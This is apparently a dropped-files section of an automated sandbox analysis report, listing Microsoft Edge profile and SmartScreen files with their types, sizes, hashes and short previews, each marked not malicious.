                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF34874.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF34a77.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF370eb.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b632.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                Malicious:false
